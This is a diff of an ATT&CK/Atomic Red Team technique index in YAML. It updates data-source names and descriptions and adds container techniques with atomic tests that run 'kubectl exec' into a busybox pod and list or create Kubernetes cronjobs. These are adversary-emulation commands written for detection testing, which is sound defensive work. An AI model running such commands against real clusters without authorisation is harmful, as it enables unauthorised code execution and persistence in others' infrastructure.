@@ -52991,6 +56099,15 @@ reconnaissance: atomic_tests: [] T1595.002: technique: + id: attack-pattern--5502c4e9-24ef-4d5f-8ee9-9e906c2f82c4 + description: |- + Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use. + + These scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)). + name: Vulnerability Scanning + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1595.002 
@@ -52999,34 +56116,25 @@ reconnaissance: url: https://wiki.owasp.org/index.php/OAT-014_Vulnerability_Scanning description: OWASP Wiki. (2018, February 16). OAT-014 Vulnerability Scanning. Retrieved October 20, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Vulnerability Scanning - description: |- - Before compromising a victim, adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use. - - These scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)). 
- id: attack-pattern--5502c4e9-24ef-4d5f-8ee9-9e906c2f82c4 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T03:58:06.761Z' + modified: '2021-04-15T03:20:09.446Z' created: '2020-10-02T16:55:16.047Z' - x_mitre_data_sources: - - Packet capture - - Network device logs + x_mitre_platforms: + - PRE + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' x_mitre_detection: |- Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields. Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - PRE + x_mitre_data_sources: + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' atomic_tests: [] T1596.002: technique: 
@@ -53042,7 +56150,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: WHOIS description: |- - Before compromising a victim, adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS) + Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS) Adversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). id: attack-pattern--166de1c6-2814-4fe5-8438-4e80f76b169f 
@@ -53050,7 +56158,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:20:43.941Z' + modified: '2021-04-15T03:50:44.113Z' created: '2020-10-02T16:56:49.744Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -53114,9 +56222,9 @@ execution: Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. x_mitre_data_sources: - - API monitoring - - Process monitoring - - Process command-line parameters + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'Process: OS API Execution' x_mitre_platforms: - macOS identifier: T1059.002 @@ -53180,8 +56288,9 @@ execution: and Control, learning details about the environment through Discovery, and Lateral Movement." x_mitre_data_sources: - - Process command-line parameters - - Process monitoring + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'Process: Process Creation' x_mitre_platforms: - Linux identifier: T1053.001 
@@ -53285,10 +56394,10 @@ execution: modified: '2020-03-24T13:43:40.776Z' created: '2019-11-27T13:52:45.853Z' x_mitre_data_sources: - - File monitoring - - Process command-line parameters - - Process monitoring - - Windows event logs + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' x_mitre_version: '1.0' x_mitre_is_subtechnique: true x_mitre_remote_support: true 
@@ -53330,49 +56439,49 @@ execution: ' T1059: technique: - id: attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Command and Scripting Interpreter - description: |- - Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). - - There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005). - - Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells. 
+ created: '2017-05-31T21:30:49.546Z' + modified: '2021-04-27T19:21:06.164Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + type: attack-pattern + revoked: false + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1059 url: https://attack.mitre.org/techniques/T1059 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - revoked: false - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - modified: '2020-10-22T16:43:39.362Z' - created: '2017-05-31T21:30:49.546Z' - x_mitre_is_subtechnique: false - x_mitre_remote_support: false - x_mitre_permissions_required: - - User - x_mitre_platforms: - - Linux - - macOS - - Windows - - Network + description: |- + Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). + + There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005). + + Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. 
Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells. + name: Command and Scripting Interpreter + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830 + x_mitre_version: '2.1' + x_mitre_data_sources: + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'Module: Module Load' + - 'Script: Script Execution' x_mitre_detection: |- Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information discovery, collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. 
- x_mitre_data_sources: - - Windows event logs - - PowerShell logs - - Process monitoring - - Process command-line parameters - x_mitre_version: '2.1' + x_mitre_platforms: + - Linux + - macOS + - Windows + - Network + x_mitre_permissions_required: + - User + x_mitre_remote_support: false + x_mitre_is_subtechnique: false atomic_tests: [] T1559.001: technique: @@ -53429,8 +56538,9 @@ execution: especially those invoked by a user different than the one currently logged on. " x_mitre_data_sources: - - Process monitoring - - DLL monitoring + - 'Module: Module Load' + - 'Process: Process Creation' + - 'Script: Script Execution' atomic_tests: [] T1175: technique: @@ -53535,15 +56645,6 @@ execution: created: '2018-01-16T16:13:52.465Z' x_mitre_deprecated: true x_mitre_version: '2.0' - x_mitre_data_sources: - - PowerShell logs - - API monitoring - - Authentication logs - - DLL monitoring - - Packet capture - - Process monitoring - - Windows Registry - - Windows event logs x_mitre_detection: |- Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1086), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017) 
@@ -53559,6 +56660,218 @@ execution: x_mitre_remote_support: true x_mitre_is_subtechnique: false atomic_tests: [] + T1609: + technique: + id: attack-pattern--7b50a1d3-4ca7-45d1-989d-a6503f04bfe1 + description: |- + Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet) + + In Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as docker exec to execute a command within a running container.(Citation: Docker Entrypoint)(Citation: Docker Exec) In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as kubectl exec.(Citation: Kubectl Exec Get Shell) + name: Container Administration Command + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1609 + url: https://attack.mitre.org/techniques/T1609 + - source_name: Docker Daemon CLI + url: https://docs.docker.com/engine/reference/commandline/dockerd/ + description: Docker. (n.d.). DockerD CLI. Retrieved March 29, 2021. + - source_name: Kubernetes API + url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/ + description: The Kubernetes Authors. (n.d.). The Kubernetes API. Retrieved + March 29, 2021. + - source_name: Kubernetes Kubelet + url: https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/ + description: The Kubernetes Authors. (n.d.). Kubelet. Retrieved March 29, + 2021. 
+ - source_name: Docker Entrypoint + url: https://docs.docker.com/engine/reference/run/#entrypoint-default-command-to-execute-at-runtime + description: Docker. (n.d.). Docker run reference. Retrieved March 29, 2021. + - source_name: Docker Exec + url: https://docs.docker.com/engine/reference/commandline/exec/ + description: Docker. (n.d.). Docker Exec. Retrieved March 29, 2021. + - source_name: Kubectl Exec Get Shell + url: https://kubernetes.io/docs/tasks/debug-application-cluster/get-shell-running-container/ + description: The Kubernetes Authors. (n.d.). Get a Shell to a Running Container. + Retrieved March 29, 2021. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + modified: '2021-04-14T12:01:10.545Z' + created: '2021-03-29T16:39:26.183Z' + x_mitre_platforms: + - Containers + x_mitre_contributors: + - Alfredo Oliveira, Trend Micro + - David Fiser, @anu4is, Trend Micro + - Brad Geesaman, @bradgeesaman + - Center for Threat-Informed Defense (CTID) + - Magno Logan, @magnologan, Trend Micro + - Vishwas Manral, McAfee + - Yossi Weizman, Azure Defender Research Team + x_mitre_detection: 'Container administration service activities and executed + commands can be captured through logging of process execution with command-line + arguments on the container and the underlying host. In Docker, the daemon + log provides insight into events at the daemon and container service level. + Kubernetes system component logs may also detect activities running in and + out of containers in the cluster. ' + x_mitre_remote_support: true + x_mitre_is_subtechnique: false + x_mitre_version: '1.0' + x_mitre_data_sources: + - 'Command: Command Execution' + identifier: T1609 + atomic_tests: + - name: ExecIntoContainer + auto_generated_guid: d03bfcd3-ed87-49c8-8880-44bb772dea4b + description: 'Attackers who have permissions, can run malicious commands in + containers in the cluster using exec command (“kubectl exec”). 
In this method, + attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as + a backdoor container, and run their malicious code remotely by using “kubectl + exec”. + +' + supported_platforms: + - linux + - macos + input_arguments: + namespace: + description: K8s namespace to use + type: String + default: default + command: + description: Command to run + type: String + default: uname + executor: + prereq_command: 'which kubectl + +' + command: | + kubectl create -f src/busybox.yaml -n #{namespace} + kubectl exec -n #{namespace} busybox -- #{command} + cleanup_command: 'kubectl delete pod busybox -n #{namespace} + +' + name: bash + elevation_required: false + T1053.007: + technique: + external_references: + - source_name: mitre-attack + external_id: T1053.007 + url: https://attack.mitre.org/techniques/T1053/007 + - source_name: Kubernetes Jobs + url: https://kubernetes.io/docs/concepts/workloads/controllers/job/ + description: The Kubernetes Authors. (n.d.). Kubernetes Jobs. Retrieved March + 30, 2021. + - source_name: Kubernetes CronJob + url: https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/ + description: The Kubernetes Authors. (n.d.). Kubernetes CronJob. Retrieved + March 29, 2021. + - source_name: Threat Matrix for Kubernetes + url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + description: Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved + March 30, 2021. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Container Orchestration Job + description: |- + Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. 
Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster. + + In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in the cluster.(Citation: Threat Matrix for Kubernetes) + id: attack-pattern--1126cab1-c700-412f-a510-61f4937bb096 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-12T18:09:46.821Z' + created: '2021-03-29T17:06:22.247Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: 'Monitor for the anomalous creation of scheduled jobs in + container orchestration environments. Use logging agents on Kubernetes nodes + and retrieve logs from sidecar proxies for application and resource pods to + monitor malicious container orchestration job deployments. ' + x_mitre_contributors: + - Center for Threat-Informed Defense (CTID) + - Vishwas Manral, McAfee + - Yossi Weizman, Azure Defender Research Team + x_mitre_platforms: + - Containers + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Container: Container Creation' + - 'File: File Creation' + identifier: T1053.007 + atomic_tests: + - name: ListCronjobs + auto_generated_guid: ddfb0bc1-3c3f-47e9-a298-550ecfefacbd + description: 'Kubernetes Job is a controller that creates one or more pods and + ensures that a specified number of them successfully terminate. Kubernetes + Job can be used to run containers that perform finite tasks for batch jobs. + Kubernetes CronJob is used to schedule Jobs. 
Attackers may use Kubernetes + CronJob for scheduling execution of malicious code that would run as a container + in the cluster. + +' + supported_platforms: + - linux + - macos + input_arguments: + namespace: + description: K8s namespace to list + type: String + default: default + executor: + prereq_command: 'which kubectl + +' + command: 'kubectl get cronjobs -n #{namespace} + +' + name: bash + elevation_required: false + - name: CreateCronjob + auto_generated_guid: f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 + description: 'Kubernetes Job is a controller that creates one or more pods and + ensures that a specified number of them successfully terminate. Kubernetes + Job can be used to run containers that perform finite tasks for batch jobs. + Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes + CronJob for scheduling execution of malicious code that would run as a container + in the cluster. + +' + supported_platforms: + - linux + - macos + input_arguments: + namespace: + description: K8s namespace to list + type: String + default: default + executor: + prereq_command: 'which kubectl + +' + command: 'kubectl create -f src/cronjob.yaml -n #{namespace} + +' + cleanup_command: 'kubectl delete cronjob art -n #{namespace} + +' + name: bash + elevation_required: false T1053.003: technique: external_references: @@ -53600,8 +56913,10 @@ execution: connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. " x_mitre_data_sources: - - Process command-line parameters - - Process monitoring + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' x_mitre_platforms: - Linux - macOS 
@@ -53694,6 +57009,76 @@ execution: cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} ' + T1610: + technique: + external_references: + - source_name: mitre-attack + external_id: T1610 + url: https://attack.mitre.org/techniques/T1610 + - source_name: Docker Containers API + url: https://docs.docker.com/engine/api/v1.41/#tag/Container + description: Docker. (n.d.). Docker Engine API v1.41 Reference - Container. + Retrieved March 29, 2021. + - source_name: Kubernetes Dashboard + url: https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard/ + description: The Kubernetes Authors. (n.d.). Kubernetes Web UI (Dashboard). + Retrieved March 29, 2021. + - source_name: Kubeflow Pipelines + url: https://www.kubeflow.org/docs/components/pipelines/overview/pipelines-overview/ + description: The Kubeflow Authors. (n.d.). Overview of Kubeflow Pipelines. + Retrieved March 29, 2021. + - source_name: Aqua Build Images on Hosts + url: https://blog.aquasec.com/malicious-container-image-docker-container-host + description: 'Assaf Morag. (2020, July 15). Threat Alert: Attackers Building + Malicious Images on Your Hosts. Retrieved March 29, 2021.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Deploy Container + description: |- + Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. 
+ + Containers can be deployed by various means, such as via Docker's create and start APIs or via a web application such as the Kubernetes dashboard or Kubeflow.(Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts) + id: attack-pattern--56e0d8b8-3e25-49dd-9050-3aa252f5aa92 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: execution + modified: '2021-04-14T12:02:20.641Z' + created: '2021-03-29T16:51:26.020Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_permissions_required: + - User + - root + x_mitre_remote_support: true + x_mitre_detection: Monitor for suspicious or unknown container images and pods + in your environment. Deploy logging agents on Kubernetes nodes and retrieve + logs from sidecar proxies for application pods to detect malicious activity + at the cluster level. In Docker, the daemon log provides insight into remote + API calls, including those that deploy containers. Logs for management services + or applications used to deploy containers other than the native technologies + themselves should also be monitored. 
+ x_mitre_contributors: + - Pawan Kinger, @kingerpawan, Trend Micro + - Alfredo Oliveira, Trend Micro + - Idan Frimark, Cisco + - Center for Threat-Informed Defense (CTID) + - Magno Logan, @magnologan, Trend Micro + - Ariel Shuper, Cisco + - Vishwas Manral, McAfee + - Yossi Weizman, Azure Defender Research Team + x_mitre_platforms: + - Containers + x_mitre_data_sources: + - 'Container: Container Creation' + - 'Container: Container Start' + - 'Pod: Pod Creation' + - 'Pod: Pod Modification' + - 'Application Log: Application Log Content' + atomic_tests: [] T1559.002: technique: created: '2020-02-12T14:10:50.699Z' @@ -53761,9 +57146,9 @@ execution: x_mitre_permissions_required: - User x_mitre_data_sources: - - Process monitoring - - DLL monitoring - - File monitoring + - 'Module: Module Load' + - 'Process: Process Creation' + - 'Script: Script Execution' identifier: T1559.002 atomic_tests: - name: Execute Commands @@ -53868,10 +57253,6 @@ execution: modified: '2020-03-28T19:06:02.690Z' created: '2018-04-18T17:59:24.739Z' x_mitre_version: '1.1' - x_mitre_data_sources: - - Anti-virus - - System calls - - Process monitoring x_mitre_detection: Detecting software exploitation may be difficult depending on the tools available. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the browser @@ -53918,11 +57299,6 @@ execution: x_mitre_deprecated: true x_mitre_is_subtechnique: false x_mitre_version: '2.0' - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - - Binary file metadata x_mitre_detection: "Detection of execution through the GUI will likely lead to significant false positives. Other factors should be considered to detect misuse of services that can lead to adversaries gaining access to systems 
@@ -53943,14 +57319,13 @@ execution: atomic_tests: [] T1559: technique: - external_references: - - source_name: mitre-attack - external_id: T1559 - url: https://attack.mitre.org/techniques/T1559 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Inter-Process Communication + created: '2020-02-12T14:08:48.689Z' + modified: '2020-03-28T19:34:47.546Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + type: attack-pattern + id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d description: "Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is 
@@ -53962,30 +57337,37 @@ execution: or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms." - id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - modified: '2020-03-28T19:34:47.546Z' - created: '2020-02-12T14:08:48.689Z' - x_mitre_data_sources: - - Process monitoring - - DLL monitoring - - File monitoring + name: Inter-Process Communication + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1559 + url: https://attack.mitre.org/techniques/T1559 + x_mitre_platforms: + - Windows + x_mitre_is_subtechnique: false + x_mitre_version: '1.0' + x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries, + or spawned processes that are associated with abuse of IPC mechanisms. x_mitre_permissions_required: - Administrator - User - SYSTEM - x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries, - or spawned processes that are associated with abuse of IPC mechanisms. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Windows + x_mitre_data_sources: + - 'Module: Module Load' + - 'Process: Process Creation' + - 'Script: Script Execution' atomic_tests: [] T1059.007: technique: + created: '2020-06-23T19:12:24.924Z' + modified: '2021-04-27T19:21:05.521Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + type: attack-pattern external_references: - source_name: mitre-attack external_id: T1059.007 
@@ -54005,24 +57387,41 @@ execution: url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved June 23, 2020. + - source_name: Apple About Mac Scripting 2016 + url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html + description: Apple. (2016, June 13). About Mac Scripting. Retrieved April + 14, 2021. + - source_name: SpecterOps JXA 2020 + url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5 + description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14, + 2021. + - source_name: SentinelOne macOS Red Team + url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/ + description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple + APIs Without Building Binaries. Retrieved July 17, 2020.' + - source_name: Red Canary Silver Sparrow Feb2021 + url: https://redcanary.com/blog/clipping-silver-sparrows-wings/ + description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s + wings: Outing macOS malware before it takes flight. Retrieved April 20, + 2021.' + - source_name: MDSec macOS JXA and VSCode + url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/ + description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans + with VSCode Extensions. Retrieved April 20, 2021. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: JavaScript/JScript + name: JavaScript description: |- - Adversaries may abuse JavaScript and/or JScript for execution. 
JavaScript (JS) is a platform-agnostic scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS) + Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS) JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts) - Adversaries may abuse JavaScript / JScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027). + JavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). 
Scripts can be executed via the command line utility osascript, they can be compiled into applications or script files via osacompile, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode) + + Adversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027). id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - modified: '2020-06-25T03:23:13.804Z' - created: '2020-06-23T19:12:24.924Z' - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_is_subtechnique: true x_mitre_permissions_required: - User 
